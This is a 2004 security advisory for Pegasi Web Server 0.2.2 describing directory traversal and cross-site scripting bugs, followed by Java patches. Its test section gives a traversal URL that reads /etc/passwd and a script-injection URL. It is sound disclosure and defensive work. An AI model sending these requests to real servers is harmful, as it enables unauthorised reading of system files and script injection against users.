Pegasi022.txt

Date: 12 Mar 2004. Reported by: Donato Ferrante. Type: packetstorm. Source: packetstormsecurity.com

Pegasi Web Server version 0.2.2 has serious flaws: directory traversal and cross site scripting vulnerabilities.

Code
` Donato Ferrante  
  
  
Application: Pegasi Web Server (PWS)  
http://pws.sourceforge.net  
  
Version: 0.2.2  
  
Bugs: Multiple Vulnerabilities  
  
Author: Donato Ferrante  
e-mail: [email protected]  
web: www.autistici.org/fdonato  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
1. Description  
2. The bugs  
3. The code  
4. The fix  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
----------------  
1. Description:  
----------------  
  
Vendor's Description:  
  
"Pegasi Web Server (PWS) is a multithreading Java Web server. It is  
written by students at the PegasiLUG as a project for Networking."  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
-------------  
2. The bugs:  
-------------  
  
[1] directory traversal bug: the program doesn't check for malicious  
patterns like "/../", so an attacker is able to navigate through  
the system simply using a browser.  
  
  
[2] cross site scripting bug: the user input strings are not filtered  
and they will appear in the returned page.  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
-------------  
3. The code:  
-------------  
  
To test the vulnerabilities:  
  
[1]  
  
http://[host]:8080/../../../../etc/passwd  
  
or:  
  
http://[host]:8080/../  
  
  
[2]  
  
http://[host]:8080/<script>alert("Test")</script>  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
  
------------  
4. The fix:  
------------  
  
No fix.  
The email addresses provided on the official website do not seem to work.  
  
  
If you want, you can use my following little patch, that should fix  
the bugs for this version of Pegasi Web Server:  
  
...  
..  
.  
  
( line: 30 of FileFinder.java ) FileFinder(String httpURIPath)  
{  
  
/* start of patch for [1] */  
  
  
boolean done = false;  
  
for(int z = 0; z < httpURIPath.length()-1; z++){  
if( httpURIPath.charAt(z) == '.' && httpURIPath.charAt(z+1) == '.'){  
this.status = -1;  
done = true;  
}  
}  
  
if( done == true ) return;  
  
  
/* end of patch for [1] */  
  
.  
..  
...  
  
- - - - -  
...  
..  
.  
  
( line: 233 of Connection.java )  
  
/* start of patch for [2] */  
  
  
case -1: /* nothing found */  
{  
Misc.putSysMessage(0,"Requested file was NOT found.");  
output.outputError(404, " ");  
//before "output.outputError(404,httpURI);"  
break;  
}  
  
  
/* end of patch for [2] */  
  
.  
..  
...  
  
  
  
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx  
`
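
Both fixes in section 4 can be made more general: resolve the request against the document root instead of scanning for "..", and HTML-escape the URI instead of dropping it from the 404 page. The Java below is an added example, not code from the advisory or from Pegasi Web Server. The class name `SafeRequest`, the `/var/www/pws` root and the helper names are assumptions, and the URI path is assumed to be percent-decoded already.

```java
import java.io.File;
import java.io.IOException;
import java.nio.file.Path;

public class SafeRequest {
    // Hypothetical document root; the advisory does not say where PWS serves from.
    private static final Path DOC_ROOT = new File("/var/www/pws").toPath();

    /** Resolve an already-decoded URI path under root; null if it escapes root. */
    static File resolve(Path root, String uriPath) throws IOException {
        Path canonRoot = root.toFile().getCanonicalFile().toPath();
        // getCanonicalFile() collapses "." and ".." and follows symlinks,
        // so the comparison is made on the path the OS would really open.
        Path target = new File(canonRoot.toFile(), uriPath).getCanonicalFile().toPath();
        // Path.startsWith compares whole name elements, so "/var/www/pws-old"
        // is not treated as being inside "/var/www/pws".
        return target.startsWith(canonRoot) ? target.toFile() : null;
    }

    /** Escape HTML metacharacters so the URI can be echoed in an error page. */
    static String escapeHtml(String s) {
        StringBuilder out = new StringBuilder(s.length() + 16);
        for (int i = 0; i < s.length(); i++) {
            char c = s.charAt(i);
            switch (c) {
                case '&':  out.append("&amp;");  break;
                case '<':  out.append("&lt;");   break;
                case '>':  out.append("&gt;");   break;
                case '"':  out.append("&quot;"); break;
                case '\'': out.append("&#39;");  break;
                default:   out.append(c);
            }
        }
        return out.toString();
    }

    public static void main(String[] args) throws IOException {
        // Constructed inputs: the advisory's test paths plus two benign names.
        String[] samples = { "/index.html", "/a..b.html", "/../",
            "/../../../../etc/passwd", "/<script>alert(\"Test\")</script>" };
        for (String uri : samples) {
            File f = resolve(DOC_ROOT, uri);
            // The escaped form is what a 404 page would be allowed to echo.
            System.out.println((f == null ? "REJECT " : "ALLOW  ") + escapeHtml(uri));
        }
    }
}
```

Unlike a substring test for "..", this accepts a legitimate name such as `/a..b.html` while still rejecting any path that resolves outside the root.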
